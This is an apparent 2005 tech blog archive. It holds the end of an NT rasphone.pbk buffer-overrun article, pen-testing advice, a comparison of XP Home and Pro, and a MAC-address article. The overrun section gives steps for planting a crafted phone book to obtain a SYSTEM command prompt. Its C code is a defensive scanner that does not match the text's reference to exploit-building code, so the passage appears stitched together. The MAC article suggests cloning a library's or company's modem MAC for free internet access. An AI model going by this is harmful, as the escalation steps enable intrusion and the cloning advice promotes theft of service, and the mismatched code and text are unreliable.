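size_t scan_phonebook(const char *text, Finding *out, size_t max)
{
    char section[64] = "(none)";
    size_t n = 0;
    const char *line = text;

    while (*line != '\0') {
        const char *end = strchr(line, '\n');
        size_t len = end ? (size_t)(end - line) : strlen(line);
        if (len > 0 && line[len - 1] == '\r')
            len--;                                   /* tolerate CRLF files */

        if (len >= 2 && line[0] == '[' && line[len - 1] == ']') {
            size_t sl = len - 2;
            if (sl > sizeof section - 1) sl = sizeof section - 1;
            memcpy(section, line + 1, sl);
            section[sl] = '\0';
        } else if (len >= strlen(PHONE_KEY) && memcmp(line, PHONE_KEY, strlen(PHONE_KEY)) == 0) {
            const char *val = line + strlen(PHONE_KEY);
            size_t vlen = len - strlen(PHONE_KEY);
            int bad = 0;
            for (size_t i = 0; i < vlen && !bad; i++)
                bad = !dialable((unsigned char)val[i]);
            if ((vlen > MAX_SANE_PHONE_LEN || bad) && n < max) {
                snprintf(out[n].section, sizeof out[n].section, "%s", section);
                out[n].length = vlen;
                out[n].non_dialable = bad;
                n++;
            }
        }
        if (end == NULL) break;
        line = end + 1;
    }
    return n;
}

/* Constructed sample: one ordinary entry and one whose number is 300 'A's,
   the probe value the page used to find the overrun. Returns 1 on success. */
int make_sample(char *buf, size_t cap)
{
    const char *head = "[Office]\nPhone Number=0123 456 789\n[Internet]\n" PHONE_KEY;
    size_t hl = strlen(head);
    if (cap < hl + 300 + 2) return 0;
    strcpy(buf, head);
    memset(buf + hl, 'A', 300);
    buf[hl + 300] = '\n';
    buf[hl + 301] = '\0';
    return 1;
}

int main(int argc, char **argv)
{
    char text[4096];
    Finding f[8];
    if (argc > 1) {                               /* scan a real phone book file */
        FILE *fp = fopen(argv[1], "rb");
        if (fp == NULL) { perror(argv[1]); return 1; }
        size_t got = fread(text, 1, sizeof text - 1, fp);
        fclose(fp);
        text[got] = '\0';
    } else if (!make_sample(text, sizeof text)) { /* otherwise use the sample */
        return 1;
    }
    size_t n = scan_phonebook(text, f, 8);
    for (size_t i = 0; i < n; i++)
        printf("[%s]: Phone Number is %zu bytes%s\n", f[i].section, f[i].length,
               f[i].non_dialable ? " and contains non-dialable bytes" : "");
    return n ? 2 : 0;
}
```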


Now to test it all.
Quite often when trying to exploit buffer overruns you don't get it right the first time - usually due to an oversight or something. The code in this document has been tested on NT Server 4 with SP 3, NT Server 4 with SP 4 and NT Workstation SP 3, all running on a Pentium processor, and it works - that's not to say that it will run on your machine though. There could be a number of reasons why it might not, but that is up to you to find out. So anyway, let's test it:
To be able to get this to work take the following steps:

1) Make a backup copy of your real rasphone.pbk file and then delete the original. The NTFS permissions on this file by default give everybody the Change permission so there shouldn't be a problem with this.

2) Run rasphone (click on Start -> Run -> type rasphone -> OK). You should get a message saying that the phone book is empty and click OK to create a new one.

3) Click OK and make a new entry calling it "Internet". Put in the relevant information needed to be able to dial into your ISP. Once the entry is complete dial it.

4) Once connected open Outlook Express and download your e-mails. The reason for doing this is because this will create a Registry entry for your mail server's domain name and associate it as an autodialable address. If Outlook Express' connection is dial up change it to a LAN connection - this'll be under the mail account's properties.

5) Hangup and close Outlook Express.

6) Delete the new rasphone.pbk and replace it with the one made from the above code.

7) Open Outlook Express.

Because you're not connected to the Internet, RASMAN should automatically dial for you, read the autodial information from the Registry, then open rasphone.pbk, fill its buffers and overflow. Within about eight seconds or so a Command Prompt window will open. This Command Prompt has SYSTEM privileges.

That's it - we've exploited a buffer overrun and executed our arbitrary code.

Article from: http://www.ngssoftware.com/papers/ntbufferoverflow.html

Wednesday, July 20, 2005

 

How to Be a Pen-Tester

Technology Updates

Read and learn about network protocols. Be able to quickly recognize things like a TCP session SYN, SYN ACK, ACK - data - FIN, FIN ACK handshake.
Read about text-based network protocols, i.e. SMTP, POP3, TELNET, FTP, HTTP etc., and be able to manage a session by hand without relying completely on a script.

Learn to look at the output of NMAP and know within 10 seconds what the purpose of each machine shown is. Learn which ports do what and what ports don't do anything. What ports are common and what ports are not. What ports are static and what ports are dynamic. Learn what ports are reserved and which aren't and what ports are superuser only and which ports are open season for any process.

Learn about firewalls and what brands are out there. Read about stateful packet inspection and absorb its usefulness and danger. Read about NAT and how it can impact security and accessibility. Learn how the shape of the headers on a packet can determine many things ranging from the host OS to the presence of a virus.

Learn about network topography and the difference between routing and switching and broadcasting. Learn about IP subnetting and the difference between public/private IP addresses. Learn about routers and how they work.. and WHY they work. And WHERE they work.

Read about the programming of the IP stack and how TCP/UDP on IP works in terms of windows and responses and learn how IP fits in with other network protocols and where TCP differs from UDP.

Learn how to code in C. Know what a buffer is and how it might overflow.
Be able to read complex C code (try the Linux kernel, last I looked at it, it was a spaghetti ball and ugly as hell, but beautiful at the same time)

Learn the difference between a virus and a worm and the difference between a rootkit and a Trojan. And the difference between a cracker, a hacker and a script-kiddie. FYI, good pen-testers are BY DEFINITION good hackers. Bad pen-testers are almost always uhhh "white hat script-kiddies".

it could keep going... there's lots more.

but being a good pen-tester is basically akin to being a good cracker.
Being a good cracker is not like TV where someone clicks buttons for 45 seconds and WHAM, they broke into the IRS mainframe. It's about patience, knowledge, intuition, knowledge, experience, knowledge and most importantly, all of the above.

FYI, FOUR semesters of Graduate Level network infrastructure, network design and "information warfare" classes didn't come close to covering all of this material.

The pen-tester has to be close to the elite of the crackers or their test does nothing.

If all you do is run some tools and see that the tools can't do any damage, you're a script-kiddie, not a pen-tester.

Comment by Eric - Hagen

Tuesday, July 19, 2005

 

Difference between XP Home and Professional

Technology Updates
Windows XP Home Edition vs. Professional Edition: What's the difference?
Updated for the RTM release of Windows XP

With the inclusion of a new consumer-oriented version of Windows XP, there has been some confusion surrounding the differences between this product, Windows XP Home Edition, and its more upscale sibling, Windows XP Professional Edition. During a visit to Redmond in February where Windows XP Beta 2 and the new Whistler ("Luna") user interface was first unveiled, and in various meetings since then, I've been able to discuss this new Windows version with Microsoft executives and product managers. Beyond the obvious--Microsoft is targeting Home Edition at consumers and Professional at business users and power users--Group Vice President Jim Allchin said that the company was working hard to further differentiate the products. "With XP, the home version is what it is," Allchin said. "But where we're going, we've named them appropriately. In the future, this will make more sense. We will do more value add in Pro in the future."


"Divide them into managed and unmanaged environments," added John Frederiksen, the General Manager of the PC Experience Solution Group, noting that some smaller businesses would probably install Home Edition regardless of the target marketing. "Some small businesses have administrators, some don’t. Home Edition is not a managed OS. It's optimized for that consumer market. A lot of the OEM PCs marketed to consumers are bought by small businesses. In terms of naming, we wanted to continue the Professional name. For the consumer product, we tested the name Windows Me again, the year names, like Windows 2002, and a lot of other stuff. But Home Edition tested the best. The feedback said that Home Edition suggested it was customized for the home, which it was. We feel like the name reflects its purpose."

Windows XP Home Edition Overview
Windows XP Home Edition includes a number of enhancements over Windows 2000 Professional. These include:

Improved software (application) and hardware compatibility
Simplified security
Simplified log-on featuring new "welcome" screen
Fast user switching
A new user interface featuring context-sensitive, task-oriented Web views
Enhanced support for digital media (movies, pictures, music)
DirectX 8.1 multimedia libraries for gaming
Professional Edition: Superset of Home Edition
At its most basic level, XP Professional is a business- and power-user oriented superset of Home Edition. Because of this orientation, it includes features that wouldn't be appropriate, or would be too complex, for the typical home user. The most obvious difference is security, which is vastly simplified in Home Edition. Each interactive user in XP Home is assumed to be a member of the Owners local group, which is the Windows XP equivalent of the Windows 2000 Administrator account: This means that anyone who logs on to a Home Edition machine has full control. Likewise, the Backup Operators, Power Users, and Replicator groups from Windows 2000/XP Pro are missing from Home Edition, and a new group, called Restricted Users, is added. Hidden administrative shares (C$, etc.) are also unavailable in Home Edition.
"Professional Edition is a strict superset of Home Edition," confirmed Chris Jones, Vice President of the Windows Client Group. "Everything you can do in Home Edition, you can do in Pro. So we do think there are home users who will buy Pro." Jones' distinction is a good one: With Windows XP, the Professional Edition is finally a superset of all the desktop clients that came before (Windows Me and Windows 2000 Professional) as well as of its new sibling. So when discussing the differences between the editions, it's best to simply describe those features in Pro that you can't get in Home Edition.

Pro features that aren't in Home Edition
The following features are not present in Windows XP Home Edition.

Power user
Remote Desktop - All versions of Windows XP--including Home Edition--support Remote Assistance, which is an assisted support technology that allows a help desk or system administrator to remotely connect to a client desktop for troubleshooting purposes. But only Pro supports the new Remote Desktop feature, which is a single-session version of Terminal Services with two obvious uses: Mobile professionals who need to remotely access their corporate desktop, and remote administration of clients on a network. You can access a Windows XP Remote Desktop from any OS that supports a Terminal Services client (such as Windows 98 and, interestingly, XP Home). XP Home can act as the client in a Remote Desktop session; only Pro can be the server.
Multi-processor support - Windows XP Pro supports up to two microprocessors, while Home Edition supports only one.
Automated System Recovery (ASR) - In a somewhat controversial move, Microsoft has removed the Backup utility from the default Windows XP Home Edition, though it is available as an optional installation if you can find it on the CD-ROM (hint: it's in the /valueadd folder). The reason for this is the integration of Microsoft's new Automated System Recovery (ASR) tool into Backup. In Pro, ASR will help recover a system from a catastrophic error, such as one that renders the system unbootable. ASR-enabled backups are triggerable from XP Setup, allowing you to return your system to its previous state, even if the hard drive dies and has to be replaced. Unlike consumer-oriented features such as System Restore, ASR is not automatic: It must be manually enabled from within the Backup utility in Windows XP Pro. In any event, while there is a Backup utility available for Home Edition, you cannot use ASR, even though mentions of this feature still exist in the UI. Confusing? Yes. But it's better than no Backup at all, which was the original plan.
Dynamic Disk Support - Windows XP Professional (like its Windows 2000 equivalent) supports dynamic disks, but Home Edition does not (instead, HE supports only the standard Simple Disk type). Dynamic disks are not usable with any OS other than Windows 2000 or Windows XP Pro, and they cannot be used on portable computers. Likewise, Home Edition does not include the Logical Disk Manager.
Fax - Home Edition has no integrated fax functionality out of the box, though it is an option you can install from the XP Home CD.
Internet Information Services/Personal Web Server - Home Edition does not include the IIS Web server 5.1 software found in Pro.
Security
Encrypting File System - Windows XP Professional supports the Encrypting File System (EFS), which allows you to encrypt individual files or folders for local security (EFS is not enabled over a network). EFS-protected files and folders allow users to protect sensitive documents from other users.
File-level access control - Any user with Administrator privileges can limit access to certain network resources, such as servers, directories, and files, using access control lists. Only Windows XP Professional supports file-level access control, mostly because this feature is typically implemented through Group Policy Objects, which are also not available in Home Edition.
"C2" certification - Microsoft will attempt to have Windows XP Professional certified with the "C2" security designation, a largely irrelevant status, but one which will not be afforded to Home Edition.
Management
Domain membership - Home Edition cannot be used to log on to an Active Directory domain. For obvious reasons, the Domain Wizard is also missing in Home Edition.
Group Policy - Since Home Edition cannot be used to log on to an Active Directory domain, Group Policy--whereby applications, network resources, and operating systems are administered for domain users--is not supported either.
IntelliMirror - Microsoft lumps a wide range of semi-related change and configuration management technologies under the IntelliMirror umbrella, and none of these features are supported in the consumer-oriented Home Edition. IntelliMirror capabilities include user data management; centrally-managed software installation, repair, updating, and removal; user settings management; and Remote Installation Services (RIS), which allows administrators to remotely install the OS on client systems.
Roaming profiles - This feature allows users to log on to any computer in an Active Directory network and automatically receive their customized settings. It is not available in Home Edition, which cannot log on to an Active Directory domain.
Corporate deployment
Multi-language support - Only Windows XP Professional will ship in a Multi-Language version or support multiple languages in a single install.
Sysprep support - Windows XP Pro will support the System Preparation (Sysprep) utility, while Home Edition will not.
RIS support - See the IntelliMirror heading in the previous section; Home Edition does not support RIS deployments.
64-bit Edition
Microsoft is shipping a 64-bit version of Windows XP for Intel Itanium systems that mirrors the Professional Edition feature-set.
Networking features
The following networking features are not included in Home Edition:
The user interface for IPSecurity (IPSec)
SNMP
Simple TCP/IP services
SAP Agent
Client Service for NetWare
Network Monitor
Multiple Roaming feature
User interface features
Windows XP Home Edition has some different default settings that affect the user interface. For example, Guest logon is on by default in Home, but off in Pro. The Address bar in Explorer windows is on in Pro by default, but off in Home. During the beta period, Microsoft had intended to use a business-oriented shell theme ("Professional") by default in Pro and the "Luna" consumer theme in Home Edition. But feedback from corporate users suggested that everyone liked the consumer-oriented Luna theme better, and development of the Professional theme was cancelled. Other user interface features that are present in Pro but not Home include:
Client-side caching
Administrative Tools option on the Start menu (a subset of the Admin tools are still present in Home, however).
It's also worth mentioning that Home Edition will support upgrades from Windows 98, 98 SE, and Millennium Edition (Me), but not from Windows 95, NT 4.0 Workstation, or Windows 2000 Professional. You can upgrade from Windows 98, 98 SE, Millennium Edition (Me), Windows NT 4.0 Workstation, or Windows 2000 Professional to Windows XP Professional. See my article on What to Expect from Windows XP for more information.
Deciding which edition to buy is simple: Peruse the above list and decide whether you can live without any of these features. If you can't, then you're going to want to get Professional. Otherwise, save $100 and get Home Edition. Note that Microsoft is offering a less-expensive Professional "Step-Up" upgrade for Home users that wish to move to XP Pro.

Extract from http://www.winsupersite.com/showcase/windowsxp_home_pro.asp

--Paul Thurrott
February 8, 2001
Updated February 20, 2001, June 15, 2001, August 24, 2001, September 4-5, 2001, November 26, 2001

Thursday, July 07, 2005

 

MAC Address Inside-Out

Technology Updates

Inside Out Of MAC Addresses
Mac Addresses :-


Hey guys, come on, let's learn what a MAC address is, what its uses are, and how it can be used to get free Internet access. OK, now let me start. Well, tell me, what's a MAC address? MAC address is short for Media Access Control address. It's the hardware address burned into your network card or cable modem :) It is a hardware address which identifies each terminal of a network. In IEEE 802 networks, the Data Link Control (DLC) layer of the OSI Reference Model is divided into two sublayers:

1) the Logical Link Control (LLC) layer and

2) the Media Access Control (MAC) layer.

The MAC layer interfaces directly with the network media. Consequently, each different type of network media requires a different MAC layer.


On networks that do not conform to the IEEE 802 standards but do conform to the OSI Reference Model, the node address is called the Data Link Control (DLC) address.

MAC addresses are 48 bits long, which means they consist of 12 hexadecimal digits (0-9 and A-F). Of those 12 hexadecimal digits, the first 6 must match the vendor of the Ethernet card, and the last 6 consist of the serial number assigned by the Ethernet vendor.


MAC addresses can be written in the following 3 manners :-

1) 123456789ABC

2) 123456-789ABC

3) 12-34-56-78-9A-BC


These MACs are physical station addresses; they cannot be called multicast or broadcast addresses.


Whether an address is a physical station address can be identified easily from the second hex digit, which for a physical station address is even and not odd.

MultiCast Address assignments can be Found at the end of the article.


MAC addresses are assigned by the IEEE, and are used in many widely used network technologies such as :-

1) Ethernet
2) Token ring
3) 802.11 wireless networks
4) ATM (switched virtual connections only, as part of an NSAP address)

MAC addresses are designed to be permanent, but nowadays a lot of people have come out with many techniques to modify this hardware-burned address and they have proved quite successful. The MAC address is stored in the serial EEPROM of the Ethernet card. In addition to holding the MAC address, the EEPROM stores a backup copy of the MAC address and ID information, user-configurable parameters, serial numbers for devices, checksums, type of interface, and other bits of backed-up information.

Now Let us try to understand how to identify the MAC address of your machine.

In Windows 98, 98SE (second edition), ME (Millennium)

Start => Run => type winipcfg. The MAC address will show under Ethernet Adapter Information as Adapter Address, but if the address commences with 44 then it is the dial-up adapter address, not your Ethernet address; in that case drop down and select the correct description of your network card.

On Windows NT4, 2000, XP and 2003

Start => Run => type cmd.exe (or go to Start => Programs => the command prompt and click on it), then type ipconfig /all and your MAC address will show under your Ethernet adapter alongside Physical Address.


On linux type this

ifconfig -a (It is located next to hwaddr)

On Linux systems, the ethernet device is typically called eth0. In order to find the MAC address of the ethernet device, you must first become root, through the use of su. Then, type ifconfig -a and look up the relevant info. For example:

# ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:60:08:C4:99:AA
inet addr:131.225.84.67 bcast:131.225.87.255 Mask:255.255.248.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:15647904 errors:0 dropped:0 overruns:0
TX packets:69559 errors:0 dropped:0 overruns:0
Interrupt:10 Base address:0x300

The MAC address is the HWaddr listed on the first line. In the case of this machine, it is 00:60:08:C4:99:AA.

On HP-UX

lanscan (It is located under Address, without colons)

$ lanscan
Hardware Station Dev Hardware Net-Interface NM Encapsulation Mjr
Path Address lu State NameUnitState ID Methods Num
2.0.2 0x08000935C99D 0 UP lan0 UP 4 ETHER 52


On Macs

Built-in Ethernet computers using MacTCP

Generally this information is not required in order to set up an AppleTalk network. However, here are four methods to find the built-in Ethernet address:

Note: In order to obtain the built-in Ethernet hardware address, the card will need to be initialized (hooked up to a valid Ethernet network).

1) Use MacTCP to identify the Ethernet address by opening MacTCP and holding the Option key when selecting the Ethernet icon. For this to work you must be sure the Caps Lock key is NOT depressed and that you are connected to an Ethernet network.

2) If your computer is using Open Transport (OT) 1.1 there is a built-in feature that lets you find the Ethernet hardware address. Follow the steps below (your computer has to be on the Ethernet network to do this; if it is not, you cannot perform these steps):
1. Open the AppleTalk control panel.
2. Go to the Edit menu and select User Mode.
3. Select the Advanced radio button and click OK.
4. Click Info.
5. The hardware address is displayed in the AppleTalk Info window.

3) You can also use the Apple LAN Utility to report the burned-in address without being connected to a network. The article "Where To Find Apple Software Updates", which lists online services for free Apple software updates, can help you locate the Apple LAN Utility software.

4) You can obtain the AG Group EtherPeek network monitoring application, which includes a utility called GetMyAddress. This utility will also return the address of the computer's internal Ethernet interface.



On Solaris or SunOS

ifconfig -a (The Leading '0' in the hex Digit is not printed)

On Solaris and SunOS systems, the ethernet device is typically called le0 or ie0. In order to find the MAC address of the ethernet device, you must first become root, through the use of su. Then, type ifconfig -a and look up the relevant info. For example:
# ifconfig -a
le0: flags=863 mtu 1500
inet 131.225.80.209 netmask fffff800 broadcast 131.225.87.255
ether 8:0:20:10:d2:ae


Note: Solaris and SunOS strip off the leading 0 commonly included in the MAC address. In the case of this machine, the MAC address is 08:00:20:10:d2:ae


On Free BSD / Open BSD / Net BSD

netstat -i (It is located under Address)
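As an added example that is not part of the original article, the following Python parser accepts the three notations listed earlier together with the HP-UX 0x... form and the Solaris/SunOS leading-zero-stripped form shown in the outputs above, normalises them, splits the vendor (OUI) and serial halves, and classifies each address as unicast, multicast or broadcast from the I/G bit of the first octet. The sample addresses are constructed, apart from the real IPv4 multicast prefix 01:00:5E and the broadcast address.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class MacAddress:
    """A 48-bit MAC address held as six raw octets."""
    octets: bytes

    @classmethod
    def parse(cls, text: str) -> "MacAddress":
        s = text.strip()
        if s[:2].lower() == "0x":            # HP-UX lanscan prints 0x08000935C99D
            s = s[2:]
        if re.fullmatch(r"[0-9A-Fa-f]{12}", s):            # 1) 123456789ABC
            return cls(bytes.fromhex(s))
        m = re.fullmatch(r"([0-9A-Fa-f]{6})-([0-9A-Fa-f]{6})", s)  # 2) 123456-789ABC
        if m:
            return cls(bytes.fromhex(m.group(1) + m.group(2)))
        # 3) 12-34-56-78-9A-BC or 12:34:56:78:9A:BC; one-digit groups are allowed
        #    because Solaris/SunOS drop leading zeros (8:0:20:10:d2:ae)
        parts = re.split(r"[-:]", s)
        if len(parts) == 6 and all(re.fullmatch(r"[0-9A-Fa-f]{1,2}", p) for p in parts):
            return cls(bytes(int(p, 16) for p in parts))
        raise ValueError(f"not a MAC address: {text!r}")

    def canonical(self) -> str:
        return ":".join(f"{b:02X}" for b in self.octets)

    @property
    def oui(self) -> str:
        """First three octets: the vendor (OUI) part."""
        return self.canonical()[:8]

    @property
    def serial(self) -> str:
        """Last three octets: the vendor-assigned serial part."""
        return self.canonical()[9:]

    @property
    def is_group(self) -> bool:
        """I/G bit (least significant bit of the first octet, i.e. an odd second
        hex digit) set: the address names a group, multicast or broadcast."""
        return bool(self.octets[0] & 0x01)

    @property
    def is_broadcast(self) -> bool:
        return self.octets == b"\xff" * 6

    @property
    def is_locally_administered(self) -> bool:
        """U/L bit (second least significant bit of the first octet) set: the
        address was chosen locally rather than assigned by the vendor. A clone
        of a vendor address keeps the bit clear, so this does not detect cloning."""
        return bool(self.octets[0] & 0x02)

    def kind(self) -> str:
        if self.is_broadcast:
            return "broadcast"
        if self.is_group:
            return "multicast"
        return "unicast"


def describe(text: str) -> dict:
    """Parse one address in any supported notation and summarise it."""
    mac = MacAddress.parse(text)
    return {
        "canonical": mac.canonical(),
        "oui": mac.oui,
        "serial": mac.serial,
        "kind": mac.kind(),
        "locally_administered": mac.is_locally_administered,
    }


def is_valid(text: str) -> bool:
    try:
        MacAddress.parse(text)
        return True
    except ValueError:
        return False


# Constructed samples: the three notations from the article, the HP-UX and
# Solaris forms shown above, an IPv4 multicast address and the broadcast address.
SAMPLES = [
    "123456789ABC", "123456-789ABC", "12-34-56-78-9A-BC",
    "0x08000935C99D", "8:0:20:10:d2:ae",
    "01:00:5E:00:00:FB", "FF-FF-FF-FF-FF-FF", "02:00:00:AA:BB:CC",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s:>20} -> {describe(s)}")
```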


The MAC address is mainly used to identify the device connected to the local network. When one computer connects to another computer on the same network, ARP is used. ARP, short for Address Resolution Protocol, is used to map network IP addresses to MAC addresses.

When a computer A wants to communicate with a computer B on the same network, and computer A knows computer B's IP address, it first finds out B's MAC address by checking its own ARP cache. The ARP cache holds the IP addresses and MAC addresses of computer A's subnet.

The command to look at the ARP cache on both Windows and Unix machines is:

linux# arp -a


C:\WINDOWS>arp -a

Again, the IP and MAC addresses of the two pinged addresses were added to the ARP cache. These dynamic entries are only temporary and have a set time to live (TTL) period before they are erased (timeout). The TTL period varies from system to system, usually from 2 to 20 minutes, and will increase to a greater number of minutes if more data from these temporary entries is requested within the allotted TTL period. The TTL period for Windows NT has a default of two minutes, Windows 2000 has a default of 10 minutes, and Solaris has a default of 5 minutes. ARP caches of routers can be much longer, as is the case with the Cisco IOS router, which has a cache time of 4 hours. For some computers, entries that are static usually remain in the cache table permanently or until the computer is rebooted. The TTL periods can be adjusted on most systems as well.

For security on networks, it would be best to set the ARP caches on your switches to hold static entries. Although not all that convenient for a LAN administrator, this will prevent ARP spoofing (an intruder sending spoofed ARP packets to Host A and Host B so that the two hosts think the intruder's computer is the intended host/router and send their data traffic through the intruder's host, allowing sniffing and packet manipulation/editing), also called man-in-the-middle attacks, since static ARP tables cannot be updated, making spoofed ARP packets useless.
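As an added example that is not part of the original article, the following Python reads Windows or Linux arp -a output and flags the symptom of the spoofing described above: one MAC answering for the gateway and another host, or a host's MAC changing between two snapshots of the cache. The listings and every address in them are constructed, not captured from a real network.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample output in the Windows "arp -a" layout.
WINDOWS_ARP = """\
Interface: 192.168.1.10 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-0c-29-3a-b1-07     dynamic
  192.168.1.25          00-0c-29-3a-b1-07     dynamic
  192.168.1.40          00-50-56-c0-00-08     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
"""

# The same constructed cache in the Linux "arp -a" layout.
LINUX_ARP = """\
gateway (192.168.1.1) at 00:0c:29:3a:b1:07 [ether] on eth0
? (192.168.1.25) at 00:0c:29:3a:b1:07 [ether] on eth0
? (192.168.1.40) at 00:50:56:c0:00:08 [ether] on eth0
"""

# Constructed earlier snapshot, taken when the gateway still had its own MAC.
BASELINE = {"192.168.1.1": "00:1a:2b:3c:4d:5e", "192.168.1.40": "00:50:56:c0:00:08"}

_MAC = r"([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})"
_IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
_WINDOWS_ROW = re.compile(r"^\s*" + _IP + r"\s+" + _MAC + r"\s+(\w+)\s*$")
_LINUX_ROW = re.compile(r"^\S+\s+\(" + _IP + r"\)\s+at\s+" + _MAC)


def norm_mac(mac: str) -> str:
    return mac.replace("-", ":").lower()


def parse_arp(output: str) -> Dict[str, str]:
    """Return {ip: mac} from Windows or Linux 'arp -a' output. Group entries
    (I/G bit set: multicast and broadcast) are skipped, since those MACs stand
    for many destinations by design and are never evidence of spoofing."""
    table: Dict[str, str] = {}
    for line in output.splitlines():
        m = _WINDOWS_ROW.match(line) or _LINUX_ROW.match(line)
        if not m:
            continue
        ip, mac = m.group(1), norm_mac(m.group(2))
        if int(mac[:2], 16) & 0x01:
            continue
        table[ip] = mac
    return table


def shared_macs(table: Dict[str, str]) -> Dict[str, List[str]]:
    """MACs that answer for more than one IP. The gateway sharing its MAC with
    an ordinary host is the man-in-the-middle symptom described above, but a
    router with secondary addresses or a proxy-ARP host looks the same, so
    treat a hit as a lead to verify on the switch, not as proof."""
    by_mac: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_entries(before: Dict[str, str], after: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """(ip, old_mac, new_mac) for IPs whose MAC differs between two snapshots;
    a gateway's MAC changing mid-session is exactly what static entries prevent."""
    return [(ip, before[ip], after[ip]) for ip in sorted(before)
            if ip in after and before[ip] != after[ip]]


if __name__ == "__main__":
    now = parse_arp(WINDOWS_ARP)
    print("shared MACs:", shared_macs(now))
    print("changed since baseline:", changed_entries(BASELINE, now))
```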

MAC addresses were designed to be fixed numbers that cannot be changed. However, there are some valid reasons to want to change your MAC address.

Changing MAC Addresses to Support Your ISP


Some ISPs, typically cable modem providers, sell Internet subscriptions on a per-address basis. Occasionally the ISP manages these subscriptions by assigning a static (fixed) IP address to the customer. However, this approach is an inefficient use of IP addresses that are currently in short supply.

More typically, ISPs manage single-address subscriptions by registering the MAC address of the device that connects to the ISP. This device could be a broadband modem, for example. The customer is free to build a home or small business network behind this modem, but the ISP expects the MAC address to match the registered value at all times.

Whenever a customer replaces their modem or adds a broadband router, the MAC address will no longer match that registered at the ISP, and the ISP will disable the customer's Internet connection.

Cloning MAC Addresses
One way to solve this problem is to call the ISP and ask them to update the registered MAC address to match the new hardware. A more efficient way to solve this problem is to configure the device so that it advertises the original MAC address, even though its hardware is built to utilize a different MAC address. This process is called cloning.

Many broadband routers today support MAC address cloning as an advanced configuration option. The exact procedure varies depending on the type of router.

MAC Addresses and Cable Modems
Note that in addition to MAC addresses stored at the ISP, some broadband modems also store the MAC address of the host computer's network adapter. However, in this case, cloning is not required. It's true that changing network adapters usually causes the cable modem connection to fail. To remedy this problem, though, requires only that the cable modem and computer be reset (and perhaps a waiting period for the ISP to release the old IP address). And this cloning can help users get free internet access: you can try to get the MAC address of a company's or library's cable modem, clone the MAC of their modem, and voila, you can use the internet for free. There is a series of steps for changing the MAC on different cable modems which is out of the scope of this article; maybe some other paper will be written on it when I get in the mood for writing such things. But it's not over: this cloning can be defeated, and it's good for me to mention here how it can be done. It can be done with the help of digital signatures from VeriSign, and each cable modem has a different digital signature which cannot be cloned. Here is a how-to from VeriSign about it :-

How do digital certificates prevent cable modem cloning?

A digital certificate, burned onto the cable modem ROM in the manufacturing process, serves as a unique, unforgeable online credential. It authenticates the identity of each individual cable modem to the cable modem service provider through an exchange of digital keys before permitting the cable modem user to access cable services. This digital "handshake" happens in seconds, hidden from the cable modem user.

Because a private key cannot be extracted from the original cable modem it is part of, a cloned cable modem cannot use the digital certificate and so will be unable to authenticate itself to the cable service provider. Without completing the "handshake" between a cable modem and the service provider, a hacker cannot pirate services.


How does the VeriSign Cable Modem Authentication Service work?

The process begins when the cable manufacturer's designated administrator creates a Media Access Controller (MAC) address file, containing the serial numbers and other identifying information of the cable modems requiring certificates, using the VeriSign-supplied Modem Manufacturing Agent (MMA) application.

The administrator sends the MAC file to VeriSign via the MMA, which can be networked to communicate directly with VeriSign. Or the administrator can use VeriSign's convenient, Web-based Managed PKI Control Center to send the files to VeriSign after obtaining them from the MMA. A special "Registration Authority" (RA) certificate digitally signs and encrypts all communications to and from VeriSign.

The Managed PKI system verifies the authenticity of the MAC file by validating the RA signature, and ensures that MAC addresses or serial numbers have not been used before. VeriSign then generates unique public and private key pairs, using dedicated bulk-generation hardware in our secure data center, and incorporates them along with VeriSign's digital signature, into certificates for every modem serial number in the MAC file.

VeriSign inserts the certificates and their private keys into a certificate batch file, and encrypts it with the MMA public key, keeping a copy of the encrypted file. (Only the MMA can decrypt the batch file, using its private key.)

The administrator is notified by an e-mail linking to a secure Web page to download the batch file of certificates. Certificates can be ordered and downloaded as often as needed - daily or weekly.

Using software provided and customized by VeriSign, the MMA decrypts the batch file and inserts the certificates and private keys into your manufacturing system as the cable modems are manufactured. Your manufacturing system can then burn the certificates and keys into the modems along with the rest of their program and setup information.


Changing MAC Addresses through the Operating System

Starting with Windows 2000, users can change their MAC address through the Windows My Network Places interface. This feature relies on software support built into the adapter driver program and thus does not work for all adapters.

Likewise, the ifconfig command available in Linux and other flavors of Unix supports changing MAC addresses with the necessary network card and driver support.

OK, now let us see how MAC addresses can be changed on different operating systems.

On Windows 98 and ME it can be done using these steps :-

Go to Start->Run, type "Winipcfg"

Select your Ethernet card and record the MAC address

Go to Start->Run, type "regedit" to bring up the registry editor. Make sure you back up your registry in case you screw up. If you screw up important registry entries, you may damage your computer system. Again, MAKE SURE you have a good backup of your registry!

Locate "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Net". It should have subkeys like "0000", "0001", "0002" and so on.

Click on each subkey, starting with "0000", and identify your Ethernet card by looking at the "DriverDesc" key. If it does not match, then go to "0001", "0002" and so on...

Once you have found the right NIC card,

Click on the dropdown menu Edit->New->String Value.

Name the new string "networkaddress" and click OK.

Double-click on the new "networkaddress" string and you will be prompted for "Value data"

Enter the new MAC address you want to assign. The MAC address you enter should be a 12 digit number with NO "-", i.e. "00C095ECB761"

Here are 2 ways to activate the new MAC address:

If you have regular internal Network Interface Card:

Reboot your system

If you have PCMCIA Card, you can do the following without rebooting (Thanks to Andrew McGlashan for his input):

Open winipcfg

Select card and release the DHCP settings

Close winipcfg

Open "PC Card (PCMCIA)" -in control panel or on the task bar if set

Stop the card

Eject the card

Re-insert the card

Open winipcfg

Select card and renew the DHCP settings


Verify the new MAC address with "WinIPCFG"



On Apple's MAC's :- /* Ripped From http://slagheap.net/etherspoof */

